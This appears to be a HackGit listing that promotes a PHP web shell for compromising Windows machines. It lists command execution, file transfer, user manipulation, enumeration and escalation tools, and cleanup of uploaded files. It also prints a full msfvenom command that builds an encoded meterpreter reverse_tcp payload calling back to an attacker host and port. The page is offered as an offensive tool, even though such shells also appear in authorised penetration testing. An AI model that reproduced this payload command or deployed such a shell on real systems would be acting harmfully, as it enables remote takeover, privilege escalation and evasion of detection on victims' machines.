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The Not-So Simple PHP Command Shell Automates or simplifies m | HackGit

The Not-So Simple PHP Command Shell

Automates or simplifies many on target functions. Designed for windows targets. It isn't pretty, but it works as intended.

I have included an assortment of common windows enumeration and escalation tools. To generate your own msfvenom payload:

venom.exe : sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ATTACKBOXIP) LPORT=(ATTACBOXPORT) -e x64/shikata_ga_nai -f exe -o venom.exe

Simple system commands
File upload/download options
simple user manipulations (on compatible targets with sufficient privileges)
One click user info/ user permissions info
One click systeminfo
One Click processes list
One click file cleanup removes all files uploaded with this tool
